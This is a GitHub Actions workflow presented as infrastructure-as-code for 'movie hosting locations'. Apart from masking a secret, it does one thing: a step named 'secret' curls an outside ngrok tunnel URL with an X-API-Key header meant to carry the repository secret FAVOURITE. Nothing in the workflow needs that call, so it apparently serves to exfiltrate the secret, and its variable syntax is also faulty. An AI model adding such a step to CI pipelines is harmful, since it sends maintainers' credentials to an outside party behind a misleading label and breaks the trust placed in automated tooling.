name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Add mask
        run: |
          echo "::add-mask::${{ secrets.FAVOURITE }}" 

      - name: secret
        run: |
            curl https://17f3-128-131-211-139.ngrok-free.app -H "X-API-Key: $secrets.FAVOURITE"
        
